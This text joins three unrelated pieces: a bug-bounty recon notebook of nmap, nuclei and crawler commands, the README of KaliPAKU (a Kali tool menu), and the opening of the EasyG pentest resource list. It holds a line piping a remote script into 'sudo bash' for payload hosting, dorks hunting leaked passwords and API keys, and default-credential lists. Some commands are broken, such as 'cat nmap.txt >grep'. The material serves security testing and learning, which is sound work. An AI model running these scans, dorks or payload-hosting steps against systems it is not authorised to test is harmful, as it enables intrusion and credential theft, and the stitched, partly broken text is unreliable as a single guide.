nmap -PE -sn x.x.x.x/x //external ICMP packet discover
nmap -sL target.com/24 -sL reverse IP lookup for the whole netwok range
nmap -PN -sn x.x.x.x/x //Don't discover
nmap -iR 300 -sL -vv // Adventures scan scan 300 random target
nmap -sV -p21-8080 --script vulners x.x.x.x
```
now find the IP range pure
```
cat nmap.txt >grep -oE '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b' > OUT.TXT
```
## now I have I list of all ip list in the network infrastructure
I want to collect them in a text file
```
cat ipRange.nmap | grep -oE '\b([0-9]{1,3}\.){3}[0-9]{1,3}\b'> OUT.TXT
```
##
## Get ALL body and headers
```
git clone https://github.com/tomnomnom/fff.git
```
## usage
```
cat urls.txt | fff
cat urls.txt | fff -d 1 -S -o fffroots
find . -type f -name *.body
grep -hri 'certain header'
```
# Spider
## https://github.com/hakluke/hakrawler
# Go spider is good too
* a script for gowitness with concurrency to take screenshots from the alive domain
```bash
https://github.com/sensepost/gowitness
#!/bin/bash
# Define the maximum number of parallel processes
MAX_PROCESSES=4
# Use xargs to execute gowitness in parallel on each line of subs.txt
cat subs.txt | xargs -I{} -n 1 -P $MAX_PROCESSES gowitness single {}
```
## Useful regex tools to clean links and extract 200 status codes
```
----------------------------------------
https://replit.com/@sp33drun/Regex-tools
---------------------------------------
# Get 200 and 403 responders
#!/bin/bash
while read line; do
if [[ $line == *"statuscode=200"* || $line == *"statuscode=403"* ]]; then
echo $line >> attack-surface.txt
fi
done < subs-responded.txt
```
## first trival thing is to find default creds!!
```
https://github.com/ihebski/DefaultCreds-cheat-sheet
```
## now we have a good attack surface let's run vulnerability scanning , my goto opensource tool is nuclei , make sure to also run your own templates
## based on the information you gathered from recon , using the default templates will only get you what everyone else gets
```
choose your prefared threading , 50 thread is really agressive and can get you blocked by the firewall
nuclei -l Attackcontinue.txt -timeout 3 -irt 3s -page-timeout 3 -no-interactsh -headless-concurrency 20 -fr -no-httpx > nuclei2.html
nuclei -l Attackcontinue.txt -timeout 3 -irt 3s -page-timeout 3 -no-interactsh -headless-concurrency 20 -fr -no-httpx -headless -v > nuclei2.html
https://github.com/projectdiscovery/cdncheck
https://github.com/projectdiscovery/fuzzing-templates
search for exploits
https://github.com/advisories
````
## CMS scanner
```
https://github.com/Tuhinshubhra/CMSeeK
```
## General purpose Scanner
```
https://github.com/jaeles-project/jaeles
https://github.com/google/tsunami-security-scanner
https://github.com/Ekultek/WhatWaf
```
## important Recon links
```
https://dnsdumpster.com/
https://hackertarget.com/
https://web.archive.org/cdx/search/cdx?url=https://checkout.card.gift/*&output=json
https://securitytrails.com/
https://censys.io/certificates
Google Dorkin https://dorksearch.com/ && Shoding Dorking https://www.shodan.io/::hostname:google.com
https://github.com/projectdiscovery/awesome-search-queries
-------------
```
```
github dorking
https://github.com/dxa4481/truffleHog
https://github.com/zricethezav/gitleaks
https://github.com/adamtlangley/gitscraper
```
#Payload Hosting
```
curl https://raw.githubusercontent.com/kgretzky/pwndrop/master/install_linux.sh | sudo bash
https://github.com/kgretzky/pwndrop
```
## Mining Secrets and Params in webarchives and Javascript
```
#scrape parms ParamSpider : Parameter miner for humans
https://github.com/devanshbatham/ParamSpider
#secret params
https://github.com/s0md3v/Arjun
#secret dirs
https://github.com/hannob/snallygaster
---------------------------------------------
https://github.com/lc/subjs.git
https://github.com/KathanP19/JSFScan.sh
https://replit.com/@sp33drun/JsPy#main.py
javascript Mass source Mapper
https://replit.com/@sp33drun/sourcemapper
https://github.com/denandz/sourcemapper
```
#make sourcemapper More powerful
```
#!/bin/bash
if [ $# -ne 1 ]; then
echo "Usage: $0 <input_file>"
exit 1
fi
input_file="$1"
counter=1
while IFS= read -r url; do
output=$(printf "%04d" "$counter")
mkdir -p "output"
sourcemapper -url "$url" -output "output/$output"
((counter++))
done < "$input_file"
```
## Fuzzing
```
https://github.com/OJ/gobuster
--------------------------------
Payload Allthings
https://github.com/swisskyrepo/
```
```
# burp collabertor free alternative for out of band detection
## https://app.interactsh.com/#/
```
```
#wordlists
## Web
https://wordlists.assetnote.io/
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/api/
```
# API Testing Automation , Note That Nothing is better than Manual
```
https://github.com/flipkart-incubator/Astra
https://github.com/microsoft/restler-fuzzer
```
# Proxy
```
[burpsuite](https://portswigger.net/burp/releases)
https://github.com/projectdiscovery/proxify
```
|
# KaliPAKU: Training Tool for Penetration Testing Using Kali Linux
![KaliPAKU_logo](img/KaliPAKU_logo.png)
![Mark](https://img.shields.io/badge/PAKURI-Mark%20V-green)
![License](https://img.shields.io/github/license/01rabbit/KaliPAKU)
![release-date](https://img.shields.io/github/release-date/01rabbit/KaliPAKU)
![sns](https://img.shields.io/twitter/follow/PAKURI9?label=PAKURI&style=social)
## What's KaliPAKU
I call it "KaliPAKU" with a hint of irony, since it looks like a tool I made myself, using tools included in Kali Linux and adding a little PAKURI control.
Incidentally, "karipaku" in Japanese slang indicates embezzling something borrowed.
> 借りパク (rōmaji karipaku)
> To take something borrowed and make it one's own property. Or to have it done to you by the other party.
> [Wikitonary:かりぱく](https://en.wiktionary.org/wiki/%E3%81%8B%E3%82%8A%E3%81%B1%E3%81%8F "かりぱく")
---
## Overview
![overview](https://user-images.githubusercontent.com/16553787/229039110-d749063f-e245-48a4-b5c2-e94d8d2db760.png)
KaliPAKU is a command-line tool for Kali Linux that provides an easy-to-use menu-driven interface to run various security tools. The tool is designed to simplify the process of running popular security tools and includes the top 10 tools from the Kali Linux distribution.
One of the unique features of KaliPAKU is its intuitive menu system, which is based on the Ten-Key Numbering System. This allows users to quickly select the tool they want to run by typing the corresponding number on the keypad. This menu system is designed to be easy to use and can be quickly mastered even by those who are new to Kali Linux.
Overall, KaliPAKU is a powerful and easy-to-use tool for anyone looking to simplify the process of running popular security tools on Kali Linux.
### What's Ten-key Numbering System
The Ten-key Numbering System enables even beginners to execute Kali Linux commands without typing them out. It is also useful for simplifying commands, even for experienced users. Key features include:
1. Commands can be executed by inputting 3 to 5 digit numbers.
2. It reduces input errors when typing out commands.
3. By using numbers to execute commands, instructions within a team become more concise.
4. It enables people with physical disabilities to participate in penetration testing if they can operate the ten-key pad.
## Description
KaliPAKU is a Bash shell script that allows users to easily access the Kali Linux tools included in the kali-tools-top10 package. One of its unique features is the Ten-Key Numbering System, which allows users to execute commands by simply typing numbers on the numeric keypad. This system is similar to the finger numbers used when learning to play a musical instrument, and is designed to make it easier for beginners to use Kali Linux.
In addition to its easy-to-use interface, KaliPAKU also includes an educational aspect. Whenever a command is executed, an explanation of the options used is displayed, helping users to learn more about the commands and options available.
KaliPAKU is based on the guidelines provided in NIST SP 800-115, which outlines the process and procedures for conducting penetration testing. As such, it includes the necessary Kali Linux tools to facilitate penetration testing, and assists users by providing step-by-step guidance.
To use KaliPAKU, simply download and run the script in the terminal. From there, users can select the desired Kali Linux tool from the numbered list and enter any necessary options. The tool will then execute and display the results.
KaliPAKU is a powerful tool for anyone looking to improve their penetration testing skills, and its user-friendly interface makes it accessible to people of all backgrounds and skill levels.
|CAUTION|
|:--- |
|If you are interested, please use them in an environment under your control and at your own risk. And, if you execute the KaliPAKU on systems that are not under your control, it may be considered an attack and you may have legally liabillity for your action.|
---
## Your benefits
The benefits of using our KaliPAKU include
- Red Team
1. Efficiency: With the Ten-Key Numbering System, Red Team members can quickly execute commands without the need to remember complex syntax.
2. Education: KaliPAKU includes explanations of the commands and options used, which can help Red Team members to better understand the tools they are using.
3. Consistency: By using KaliPAKU, Red Team members can ensure that they are consistently using the same set of tools and commands, which can help to reduce errors and improve their overall effectiveness.
- Blue Team
1. Monitoring: The assisting features provided by KaliPAKU help them understand the tools and procedures an attacker might use. This allows Blue Teams to detect and respond to signs of an attack earlier.
2. Reverse Investigations: Blue Teams can use KaliPAKU to perform reverse investigations. This allows them to identify and remediate potential vulnerabilities and attack vectors.
3. Training: KaliPAKU allows blue team members to perform validation procedures similar to those used by attackers. This allows the blue team to better assess the risk of an attack from a different perspective.
- Beginners & Scriptkiddy
1. Ease of use: By using the Ten-Key Numbering System, beginners do not need to learn complicated commands.
2. Learning: KaliPAKU includes explanations of commands and options so that beginners can better understand the tools they are using.
3. Motivation: KaliPAKU makes it easy for beginners to perform tasks. This allows them to take the next step with confidence and increases their motivation to learn.
---
## usage
1. Just start kalipaku.sh. Installation is not required in principle.
``` shell
┌──(kali㉿kali)-[~/KaliPAKU]
└─$ ./kalipaku.sh
```
2. KaliPAKU Terminal will be activated.
![KaliPAKU Terminal](https://user-images.githubusercontent.com/16553787/200162688-e8f11bce-890b-4af2-b58b-a284145ac24b.png)
3. KaliPAKU Terminal
Enter "kp" or "kalipaku" at the KaliPAKU terminal or enter the magic number "4649" to activate the KaliPAKU menu.
![KaliPAKU menu](https://user-images.githubusercontent.com/16553787/229037118-80dd7e8e-0a5d-4040-99c5-fd9c54a93048.png)
4. KaliPAKU Cheatsheet
Here is a partial cheat sheet of commands that can be called up in the KaliPAKU menu. To check the cheat sheet, use "cs", "cheat", or "cheatsheet". You can also use the magic number "4936".
![cheatsheet](https://user-images.githubusercontent.com/16553787/200162706-4f6231c5-d96e-4788-8d64-786f949c2ff1.png)
---
## Tools used
### Installed on kali linux
- kali-tools-top10
1. [Aircrack-ng](https://www.kali.org/tools/aircrack-ng/#aircrack-ng)
2. [burpsuite](https://www.kali.org/tools/burpsuite/)
3. [crackmapexec](https://www.kali.org/tools/crackmapexec/)
4. [hydra](https://www.kali.org/tools/hydra/)
5. [john](https://www.kali.org/tools/john/)
6. [metasploit-framework](https://www.kali.org/tools/metasploit-framework/)
7. [nmap](https://www.kali.org/tools/nmap/)
8. [responder](https://www.kali.org/tools/responder/)
9. [sqlmap](https://www.kali.org/tools/sqlmap/)
10. [wireshark](https://www.kali.org/tools/wireshark/)
- Other Kali tools
1. [gobuster](https://www.kali.org/tools/gobuster/)
2. [Kali Undercover](https://www.kali.org/docs/introduction/kali-undercover/)
3. [msfpc](https://www.kali.org/tools/msfpc/)
4. [Netcat](https://www.kali.org/tools/netcat/)
5. [python-faraday](https://www.kali.org/tools/python-faraday)
6. [searchsploit](https://www.kali.org/tools/exploitdb/#searchsploit)
7. [set](https://www.kali.org/tools/set/#setoolkit)
8. [tshark](https://www.kali.org/tools/wireshark/#tshark)
9. [wifite](https://www.kali.org/tools/wifite/)
### Added tools
- Github tools
1. [nmapAutorecon](https://github.com/21y4d/nmapAutomator)
- Original
1. vulncheck
---
## How to use
1. To scan with Nmap, start KaliPAKU and activate the KaliPAKU menu. The magic number to type is "4649". The magic number is "4649", which means "greetings" in Japanese.
![KaliPAKU Menu](https://user-images.githubusercontent.com/16553787/229037118-80dd7e8e-0a5d-4040-99c5-fd9c54a93048.png)
2. Then enter the magic number "1022" if you want to perform an Intense Scan of Nmap(It takes only about 0.5 seconds to transition to this screen)
![nmap](https://user-images.githubusercontent.com/16553787/200163893-d712c21e-da9c-460c-91d3-1f39a363e5f0.png)
3. You will then be prompted to enter the IP address of the destination.
![nmap2](https://user-images.githubusercontent.com/16553787/200163894-cb256bf1-1ddf-46ca-a3b0-acfd83a120fb.png)
4. Then, press "2" for "Yes" after the final confirmation if it is OK.
This completes the process. Now wait for the result.
## Demo
### Demo1 From Recon to Exploit
1. port scan
2. vulnerability scan
3. vulnerability enumeration
4. Exploit code investigation
5. Exploit Execution
Perform the above steps against metasploitable2 using KaliPAKU. Notice how concise and intuitive the behavior is using the ten-key numbering system!
[![demo1](https://user-images.githubusercontent.com/16553787/220332167-1b802cd4-0b19-4cab-b812-fa5c68104c87.png)
](https://youtu.be/da9q_re48XM)
### Demo2 Password List Attack
1. Using Faraday to Aggregate Information
2. Service Enumeration
3. Password List Attack
Use Faraday to effectively use the reconnaissance information collected in Demo1. See the procedure for starting Faraday and importing data using a ten-key numbering system.
[![demo2](https://user-images.githubusercontent.com/16553787/220333705-847f55eb-9171-4bec-809b-9ac69c364240.png)
](https://youtu.be/F5w3mfQElBk)
## Operation check environment
- OS: Kali Linux 2023.1
- Memory: 2048MB
## Presentation
- February 12th,2023: [SECCON 2022](https://www.seccon.jp/2022/ep230211.html)
## Contributors
If you have some new idea about this project, issue, feedback or found some valuable tool feel free to open an issue for just DM me via [@Mr.Rabbit](https://twitter.com/01ra66it) or [@PAKURI](https://twitter.com/PAKURI9).
|
```ruby
███████╗ █████╗ ███████╗██╗ ██╗ ██████╗
██╔════╝██╔══██╗██╔════╝╚██╗ ██╔╝██╔════╝
█████╗ ███████║███████╗ ╚████╔╝ ██║ ███╗
██╔══╝ ██╔══██║╚════██║ ╚██╔╝ ██║ ██║
███████╗██║ ██║███████║ ██║ ╚██████╔╝
╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝
Made with <3 by Riccardo Malatesta (@seeu)
```
[![License](https://img.shields.io/github/license/seeu-inspace/easyg)](https://github.com/seeu-inspace/easyg/blob/main/LICENSE)
[![Twitter](https://img.shields.io/twitter/follow/seeu_inspace?style=social)](https://twitter.com/intent/follow?screen_name=seeu_inspace)
[![Open Source Love](https://badges.frapsoft.com/os/v1/open-source.svg?v=103)](https://github.com/ellerbrock/open-source-badges/)
EasyG started out as a script that I use to automate some information gathering tasks for my hacking process, [you can find it here](https://github.com/seeu-inspace/easyg/blob/main/easyg.rb). Now it's more than that. Here I gather all the resources about PenTesting and Bug Bounty Hunting (and more) that I find interesting: notes, payloads, tools & co.
### <ins>Index</ins>
- [Blog / Writeups / News & more](#blog--writeups--news--more)
- [Safety tips](#safety-tips)
- [Check-lists](#check-lists)
- [Content Discovery](#content-discovery)
- [Tools](#tools)
- [Burp Suite](#burp-suite)
- [Network](#network)
- [Linux](#linux)
- [Mobile](#mobile)
- [Source code review](#source-code-review)
- [Web vulnerabilities](#web-vulnerabilities)
- [SQL Injection](#sql-injection)
- [Authentication vulnerabilities](#authentication-vulnerabilities)
- [Directory Traversal](#directory-traversal)
- [OS Command Injection](#os-command-injection)
- [Business logic vulnerabilities](#business-logic-vulnerabilities)
- [Information Disclosure](#information-disclosure)
- [Access control vulnerabilities and privilege escalation](#access-control-vulnerabilities-and-privilege-escalation)
- [File upload vulnerabilities](#file-upload-vulnerabilities)
- [Server-side request forgery (SSRF)](#server-side-request-forgery-ssrf)
- [Open redirection](#open-redirection)
- [XXE injection](#xxe-injection)
- [Cross-site scripting (XSS)](#cross-site-scripting-xss)
- [Cross-site request forgery (CSRF)](#cross-site-request-forgery-csrf)
- [Cross-origin resource sharing (CORS)](#cross-origin-resource-sharing-cors)
- [Clickjacking](#clickjacking)
- [DOM-based vulnerabilities](#dom-based-vulnerabilities)
- [WebSockets](#websockets)
- [Insecure deserialization](#insecure-deserialization)
- [Server-side template injection](#server-side-template-injection)
- [Web cache poisoning](#web-cache-poisoning)
- [HTTP Host header attacks](#http-host-header-attacks)
- [HTTP request smuggling](#http-request-smuggling)
- [OAuth authentication](#oauth-authentication)
- [JWT Attacks](#jwt-attacks)
- [Abusing S3 Bucket Permissions](#abusing-s3-bucket-permissions)
- [Google Cloud Storage bucket](#google-cloud-storage-bucket)
- [GraphQL](#graphql)
- [WordPress](#wordpress)
- [IIS - Internet Information Services](#iis---internet-information-services)
- [Lotus Domino](#lotus-domino)
- [Git source code exposure](#git-source-code-exposure)
- [Subdomain takeover](#subdomain-takeover)
- [4** Bypass](#4-bypass)
- [Thick client vulnerabilities](#thick-client-vulnerabilities)
- [DLL Hijacking](#dll-hijacking)
- [Insecure application design](#insecure-application-design)
- [Weak Hashing Algorithms](#weak-hashing-algorithms)
- [Cleartext secrets in memory](#cleartext-secrets-in-memory)
- [Hardcoded secrets](#missing-code-obfuscation)
- [Unsigned binaries](#unsigned-binaries)
- [Lack of verification of the server certificate](#lack-of-verification-of-the-server-certificate)
- [Insecure SSL/TLS configuration](#insecure-ssltls-configuration)
- [Remote Code Execution via Citrix Escape](#remote-code-execution-via-citrix-escape)
- [Direct database access](#direct-database-access)
- [Insecure Windows Service permissions](#insecure-windows-service-permissions)
- [Code injection](#code-injection)
<hr/>
## Blog / Writeups / News & more
- [PortSwigger/research](https://portswigger.net/research)
- [Skeleton Scribe (albinowax)](https://www.skeletonscribe.net)
- [CVE trends](https://cvetrends.com/)
- [Packet Storm](https://packetstormsecurity.com/)
- [Securibee](https://securib.ee/)
- [Sam Curry](https://samcurry.net/)
- [Hacking Apple](https://samcurry.net/hacking-apple/)
- [Intigriti/xss-challenges/](https://blog.intigriti.com/hackademy/xss-challenges/)
- [HackerOne.com/hacktivity](https://hackerone.com/hacktivity)
- [List of bug-bounty writeups](https://pentester.land/list-of-bug-bounty-writeups.html)
- [Pentest reports](https://pentestreports.com/)
- [Public pentesting reports](https://github.com/juliocesarfort/public-pentesting-reports)
- [pentestbook.six2dez.com](https://pentestbook.six2dez.com/)
- [TheXcellerator](https://xcellerator.github.io/)
- [persistence-info.github.io](https://persistence-info.github.io/)
- [Facebook-BugBounty-Writeups](https://github.com/jaiswalakshansh/Facebook-BugBounty-Writeups)
## Safety tips
- For RCE
- Never upload a shell at first, you can be banned from a program. Just execute a `whoami` as a PoC, proceed with a shell if required/allowed.
- For stored XSS
- `console.log()` is better than `alert()`, it makes less noise especially for stored XSS.
- For SQLi
- Don't dump the entire db, you can be banned from a program. Just retrieve the db's name, version and/or other minor infos. Proceed with db dump only if required/allowed;
- Don't use tautologies like `OR 1=1`, it can end up in a delete query or something dangerous. It's better to use `AND SLEEP(5)` or `te'+'st`.
- For subdomain takeovers
- use as a PoC an html page like:<br/>
9a69e2677c39cdae365b49beeac8e059.html
```HTML
<!-- PoC by seeu -->
```
## Check-lists
- [SMB-Checklist](https://github.com/pentesterzone/pentest-checklists/blob/master/Services/SMB-Checklist.md)
- [Win32 Offensive Cheatsheet](https://github.com/matthieu-hackwitharts/Win32_Offensive_Cheatsheet)
- [Regexp Security Cheatsheet](https://github.com/attackercan/regexp-security-cheatsheet)
- [Cheat-Sheet - Active-Directory](https://github.com/drak3hft7/Cheat-Sheet---Active-Directory)
- [Security Testing of Thick Client Application](https://medium.com/@david.valles/security-testing-of-thick-client-application-15612f326cac)
### <ins>Risk markers</ins>
- [ ] Copyright 1995
- [ ] Server: Apache 2.2
- [ ] Expider SSL Certificate
- [ ] "Internal" in hostname
- [ ] Shodan returns CVEs
- [ ] Nuclei template matches
### <ins>Testing layers</ins>
- [ ] Integrations
- [ ] Application Libraries (usually JavaScript)
- [ ] Application: Custom Code or COTS
- [ ] Application Framework
- [ ] Web Hosting Software (Default creds, Web server misconfigurations, web exploits)
- [ ] Open Ports and Services (Default creds on services, service level exploits)
### <ins>Multiple targets</ins>
- [ ] Run EasyG assetenum + take screenshots or open results in firefox
- [ ] Select the interesting targets, see [Risk markers](#risk-markers)
- [ ] Check for mobile/desktop applications
### <ins>Single target</ins>
- [ ] Recon
+ Explore the app
+ Search for documentation
+ Use Crawl from EasyG and Burp, use Paramspider
+ See every functionality
+ Collect endpoints with [BurpJSLinkFinder](https://github.com/InitRoot/BurpJSLinkFinder)
+ Find more endpoints with Apkleak, Source2Url and see [Content Discovery](#content-discovery)
- [ ] Test Register
- [ ] Test Login: 2FA, Password reset, Open Redirect & co.
- [ ] [Upload Functions](#file-upload-vulnerabilities)
- [ ] Broken Access Control, IDOR & co
- [IDOR Checklist](https://twitter.com/hunter0x7/status/1580211248037126145)
- [ ] Content Types
- Look for multipart-forms
- Look for content type XML
- Look for content type json
- [ ] APIs
- Methods
- [API Security Checklist](https://github.com/shieldfy/API-Security-Checklist)
- [ ] Account Section
- Profile
- Stored XSS
- App Custom Fields
- Integrations
- SSRF, XSS
- [ ] Errors
- Change POST to GET
- [ ] [Test CSRF](#cross-site-request-forgery-csrf)
- [ ] Check if caching is implemented and how
- [ ] Check Cross-domain interactions
- [ ] [OWASP Testing Guide](https://owasp.org/www-project-web-security-testing-guide/)
- [ ] [OWASP Web Application Penetration Checklist](https://wiki.owasp.org/index.php/Testing_Checklist)
### <ins>Mobile</ins>
- [Mobile Application Penetration Testing Cheatsheet](https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet)
- [Mobile Hacking Cheatsheet](https://github.com/randorisec/MobileHackingCheatSheet)
- [OWASP Mobile Application Security](https://mas.owasp.org/)
## Content Discovery
**Some tips**
- If the application is ASP.NET, search for `Appsettings.json`
- Use recursion. If you encounter a `401` response, search with waybackmachine
- Search for past reports in the same program
**Check the tech of a target with**
- [Wappalyzer](https://www.wappalyzer.com/)
- [Webanalyze](https://github.com/rverton/webanalyze) Port of Wappalyzer for command line
`./webanalyze -host example.com -crawl 1`
- [Shodan](https://chrome.google.com/webstore/detail/shodan/jjalcfnidlmpjhdfepjhjbhnhkbgleap)
**Tools**
- [feroxbuster](https://github.com/epi052/feroxbuster) `feroxbuster -u https://example.com/ --proxy http://127.0.0.1:8080 -k -w wordlist.txt -s 200,403`
- [dirsearch](https://github.com/maurosoria/dirsearch)
- [changedetection.io](https://github.com/dgtlmoon/changedetection.io)
- [ffuf](https://github.com/ffuf/ffuf)
**Wordlists**
- [SecLists](https://github.com/danielmiessler/SecLists)
- [wordlists.assetnote.io](https://wordlists.assetnote.io/)
- [content_discovery_all.txt](https://gist.github.com/jhaddix/b80ea67d85c13206125806f0828f4d10)
- [OneListForAll](https://github.com/six2dez/OneListForAll)
- [wordlistgen](https://github.com/ameenmaali/wordlistgen)
- [Scavenger](https://github.com/0xDexter0us/Scavenger)
**To find more endpoints**
- [Apkleak](https://github.com/dwisiswant0/apkleaks) to get endpoints from an apk
- [Source2Url](https://github.com/danielmiessler/Source2URL/blob/master/Source2URL) to get endpoints from a source code
- [waymore](https://github.com/xnl-h4ck3r/waymore) more results from the Wayback Machine
- [BurpJSLinkFinder](https://github.com/InitRoot/BurpJSLinkFinder)
**Google Dorking**
- `ext:` to search for: php, php3, aspx, asp, jsp, xhtml, phtml, html, xsp, nsf, form,swf;
- Search also for pdf, xlsx, bak and similar, they may contain some infos;
- `site:` to target a website and its subdomains;
- `inurl:&` to search for parameters;
- `intitle:` to search interesting pages like admin, register, login etc.
- [Dorking on Steroids](https://hazanasec.github.io/2021-03-11-Dorking-on-Steriods/)
- `"Seeing something unexpected? Take a look at the GitHub profile guide." "COMPANY-TARGET" site:http://github.com` [[Reference](https://twitter.com/c3l3si4n/status/1580564006263173122)]
- [dorks_hunter](https://github.com/six2dez/dorks_hunter)
- `intext:"© copyright COMPANY YEAR"` [[Reference](https://twitter.com/intigriti/status/1592497655774871553)]
- `site:target.com intext:login intext:username intext:password`
- Exposed .git `intext:"index of /.git" "parent directory"`
- Search for s3 buckets `site:.s3.amazonaws.com "COMPANY"`
- Find CVEs, like CVE-2019-9647 `intext:"Powered by Gila CMS"`
- Errors `site:target.com intext:"Warning: mysql_num_rows()"`
- `intitle:"Index of /" + ".htaccess"`
**GitHub Dorking**
- sensitive words: `password, api_key, access_key, dbpassword, dbuser, pwd, pwds, aws_access, key, token, credentials, pass, pwd, passwd, private, preprod, appsecret`
- languages: `json, bash, shell, java etc.`, example `HEROKU_API_KEY language:json`
- extensions: `extensions: bat, config, ini, env etc.`
- filename: `netrpc, .git-credentials, .history, .htpasswd, bash_history`
- [Other dorks](https://github.com/techgaun/github-dorks#list-of-dorks)
- [GitDorker](https://github.com/obheda12/GitDorker)
## Tools
**For a temporary public server**
- [XAMPP](https://www.apachefriends.org/) + [ngrok](https://ngrok.com/)
- [beeceptor](https://beeceptor.com/)
**For auths**
- [textverified.com](https://www.textverified.com/) for auths requiring a phone number
- [temp-mail.org](https://temp-mail.org/en/)
- To have multiple email adresses using gmail, you can add a `+` sign after your email's alias. For example: if your email is `[email protected]` and you sign up for Twitter you can sign up using `[email protected]`. [[Reference](https://twitter.com/_thegameoflife_/status/1564642697482231813)]
**To find parameters**
- [Arjun](https://github.com/s0md3v/Arjun) detection of the parameters present in the application
- [ParamSpider](https://github.com/devanshbatham/ParamSpider)
**Asset enumeration/discovery**
- [amass](https://github.com/OWASP/Amass)
- `amass enum -brute -active -d target -o output/target.txt -v`
- [subfinder](https://github.com/projectdiscovery/subfinder)
- `subfinder -d target -all -o output/target_subfinder.txt"`
- [github-subdomains](https://github.com/gwen001/github-subdomains)
- [nmap](https://nmap.org/)
- Discover everything + services `nmap -p 1-65535 -sV -T4 -Pn -n -vv -iL target.txt -oX out.xml`
- [bgp.he.net](https://bgp.he.net/) to find ASN + `amass intel -asn <ASN>`
- [crt.sh](https://crt.sh/)
- [Crtsh-Fetcher](https://github.com/m0pam/crtsh-fetcher)
- To find new domains ` cat json.txt | jq -r '.[].common_name' | sed 's/\*//g' | sort -u | rev | cut -d "." -f 1,2 | rev | sort -u | tee out.txt`
- [naabu](https://github.com/projectdiscovery/naabu)
- Discover everything faster `naabu -l 1.txt -v -p - -exclude-ports 80,443,81,3000,3001,8000,8080,8443 -c 1000 -rate 7000 -stats -o 1_o.txt`
- `naabu -v -list subs.txt -exclude-ports 80,443,81,3000,3001,8000,8080,8443 -stats -o out.txt`
- [gobuster](https://github.com/OJ/gobuster) + [all.txt by jhaddix](https://gist.github.com/jhaddix/86a06c5dc309d08580a018c66354a056)
- [gb.rb](https://github.com/seeu-inspace/easyg/blob/main/scripts/gb.rb)
- [dnsx](https://github.com/projectdiscovery/dnsx)
- Reverse DNS lookup `cat ip.txt | dnsx -ptr -resp-only`
- [VhostScan](https://github.com/codingo/VHostScan) to discover virtual hosts
- [gip](https://github.com/dalance/gip) a command-line tool and Rust library to check global IP address.
- [httprobe](https://github.com/tomnomnom/httprobe)
- `type subs.txt | httprobe -p http:81 -p http:3000 -p https:3000 -p http:3001 -p https:3001 -p http:8000 -p http:8080 -p https:8443 -c 150 > out.txt`
**Crawling**
- [gospider](https://github.com/jaeles-project/gospider)
- `gospider -s target -c 10 -d 4 -t 20 --sitemap --other-source -p http://localhost:8080 --cookie "0=1" --blacklist ".(svg|png|gif|ico|jpg|jpeg|bpm|mp3|mp4|ttf|woff|ttf2|woff2|eot|eot2|swf|swf2|css)"`
- [hakrawler](https://github.com/hakluke/hakrawler)
- `cat target.txt | hakrawler -u -insecure -t 20 -proxy http://localhost:8080 -h "Cookie: 0=1"`
- [Katana](https://github.com/projectdiscovery/katana)
- `katana -u target -jc -kf -aff -proxy http://127.0.0.1:8080"`
- [xnLinkFinder](https://github.com/xnl-h4ck3r/xnLinkFinder)
**For vulnerabilities**
- [BruteSpray](https://github.com/x90skysn3k/brutespray) `python brutespray.py --file nmap.xml --threads 5 --hosts 5`
- [SearchSploit](https://github.com/offensive-security/exploitdb#searchsploit) Port services vulnerability checks
- [CMSeeK](https://github.com/Tuhinshubhra/CMSeeK) CMS Detection & Exploitation Suite
- [nuclei](https://github.com/projectdiscovery/nuclei)
- Automatic Selection `nuclei -u http://target.io -as`
- Check for Exposed panels `%USERPROFILE%\nuclei-templates\exposed-panels`
- Check for Technologies `%USERPROFILE%\nuclei-templates\technologies`
- Check for more `-t %USERPROFILE%\nuclei-templates\misconfiguration -t %USERPROFILE%\nuclei-templates\cves -t %USERPROFILE%\nuclei-templates\cnvd`
- Used in [easyg.rb](https://github.com/seeu-inspace/easyg/blob/main/easyg.rb) `nuclei -l httprobe_results.txt -t %USERPROFILE%/nuclei-templates/takeovers -t %USERPROFILE%/nuclei-templates/exposures/configs/git-config.yaml -t %USERPROFILE%/nuclei-templates/vulnerabilities/generic/crlf-injection.yaml -t %USERPROFILE%/nuclei-templates/exposures/apis/swagger-api.yaml -t %USERPROFILE%/nuclei-templates/vulnerabilities/generic/crlf-injection.yaml -o out.txt`
- Use it in a workflow `cat subdomains.txt | httpx | nuclei -t technologies`
- log4j `nuclei -l list.txt -as -tags log4j -o output.txt`
- [nuclei geeknik](https://github.com/geeknik/the-nuclei-templates)
**For Reporting**
- [Vulnerability Rating Taxonomy](https://bugcrowd.com/vulnerability-rating-taxonomy)
- [CVSS Calculator](https://www.first.org/cvss/calculator/3.1)
- [PwnDoc](https://github.com/pwndoc/pwndoc)
- [Vulnrepo](https://vulnrepo.com/home)
- [PlexTrac](https://plextrac.com/)
**Other**
- [URL Decoder/Encoder](https://meyerweb.com/eric/tools/dencoder/)
- [base64encode.org](https://www.base64encode.org/)
- [Down or not](https://www.websiteplanet.com/webtools/down-or-not/)
- [DigitalOcean](https://www.digitalocean.com/) See [Setting Up Your Ubuntu Box for Pentest and Bug Bounty Automation](https://www.youtube.com/watch?v=YhUiAH5SIqk)
- [trashcompactor](https://github.com/michael1026/trashcompactor) to remove URLs with duplicate funcionality based on script resources included
- [jdam - Structure-aware JSON fuzzing](https://gitlab.com/michenriksen/jdam)
- [Visual Studio Code](https://code.visualstudio.com/) for Source Code Analysis
- [beautifier.io](https://beautifier.io/) for JavaScript Analysis
- [FuzzCoupons](https://github.com/sbrws/FuzzCoupons)
- [anew](https://github.com/tomnomnom/anew)
### <ins>Burp suite</ins>
To add a domain + subdomains in advanced scopes: `^(.*\.)?test\.com$`
To add a new header
```
1. Go to Proxy -> Options -> Match and Replace -> Add
2. Change Type to Request Header
3. As the default text says in Match 'leave blank to add a new header'
4. Put the new header in Replace
```
Cool extensions:
- [Turbo Intruder](https://github.com/PortSwigger/turbo-intruder)
- [HTTP Request Smuggler](https://github.com/PortSwigger/http-request-smuggler)
- [Wsdler](https://github.com/NetSPI/Wsdler) to interact with SOAP
- [InQL](https://portswigger.net/bappstore/296e9a0730384be4b2fffef7b4e19b1f)
- [Swagger-EZ](https://github.com/RhinoSecurityLabs/Swagger-EZ)
- [BurpCustomizer](https://github.com/CoreyD97/BurpCustomizer)
- [Software Version Reporter](https://portswigger.net/bappstore/ae62baff8fa24150991bad5eaf6d4d38)
- [Software Vulnerability Scanner](https://portswigger.net/bappstore/c9fb79369b56407792a7104e3c4352fb)
